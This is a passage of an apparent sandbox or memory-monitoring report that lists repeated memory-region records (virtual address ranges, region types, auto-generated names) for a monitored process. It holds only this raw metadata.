region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17030 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17031 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17032 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17033 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17034 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17035 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17036 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17037 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17038 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17039 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17040 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17041 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17042 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17043 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17044 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17045 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17046 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17047 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 17048 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17049 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17050 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17051 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17052 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17053 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17054 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17055 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17056 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17057 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17058 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17059 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17060 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17061 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17062 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17063 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17064 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17065 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17066 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17067 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17068 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17069 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17070 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17071 start_va = 0x4140000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 17072 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 17073 start_va = 0x41d0000 end_va = 0x41defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041d0000" filename = "" Region: id = 17074 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17075 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17076 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17077 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17078 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17079 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17080 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17081 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17082 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17083 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17084 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17085 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17086 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17087 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17088 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17089 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17090 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17091 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17092 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17093 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17094 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17095 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17096 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17097 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17098 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17099 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17100 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17101 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17102 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17103 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17104 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17105 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17106 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17107 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17108 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17109 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17110 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17111 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17112 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17113 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17114 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17115 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17116 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17117 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17118 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17119 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17120 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17121 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17122 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17123 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17124 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17125 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17126 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17127 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17128 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17129 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17130 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17131 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17132 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17133 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17134 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17135 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17136 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17137 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17138 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17139 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17140 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17141 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17142 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17143 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17144 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17145 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17146 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17147 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17148 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17149 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17150 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17151 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17152 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17153 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17154 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17155 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17156 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17157 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17158 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17159 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17160 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17161 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17162 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17163 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17164 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17165 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17166 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17167 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17168 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17169 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17170 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17171 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17172 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17173 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17174 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17175 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17176 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17177 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17178 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17179 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17180 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17181 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17182 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 17183 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 17184 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17185 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17186 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17187 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17188 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17189 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17190 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17191 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17192 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17193 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17194 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17195 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17196 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17197 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17198 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17199 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17200 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17201 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17202 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17203 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17204 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17205 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17206 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17207 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17208 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17209 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17210 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17211 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17212 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17213 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17214 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17215 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17216 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 17217 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 